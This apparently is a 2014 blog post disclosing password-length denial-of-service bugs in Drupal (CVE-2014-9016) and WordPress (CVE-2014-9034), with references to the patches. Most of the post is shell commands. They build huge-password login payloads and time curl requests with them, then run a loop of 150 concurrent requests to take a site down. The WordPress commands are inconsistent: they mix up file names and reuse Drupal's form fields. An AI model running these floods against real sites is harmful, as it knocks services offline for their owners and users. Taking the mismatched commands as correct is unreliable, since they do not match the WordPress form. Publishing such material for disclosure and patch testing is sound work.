Assuming that time enough has happened since the security update was released by Wordpress and Drupal, we want to share our researches. As you already know, we believe in Responsible Disclosure and that is the reason why we didn't publish this post before.
Set Quality to 720p
Drupal Denial of Service CVE-2014-9016
Generate a pyaload and try with a non-valid user:$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload
$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &
Generate a pyaload and try with a valid user:
$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload
$ time curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &
Perform a Dos with a valid user:
$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.25; done
Wordpress Denial of Service CVE-2014-9034
Generate a pyaload and try with a non-valid user:$ echo -n "log=NO-VALID-USER&pwd=" > payload && printf "%s" {1..1000000} >> payload && echo -n "&wp-submit=Log In" >> payload
$ time curl --data @no_valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &
Generate a pyaload and try with a valid user:
$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload
$ time curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &
Perform a Dos with a valid user:
$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done
Python Code
https://github.com/c0r3dump3d/wp_drupal_timing_attackReferences
http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.htmlhttp://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
http://www.devconsole.info/?p=1050
https://wordpress.org/news/2014/11/wordpress-4-0-1/
https://www.drupal.org/SA-CORE-2014-006
https://www.drupal.org/node/2378367
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9016
0 comments:
Post a Comment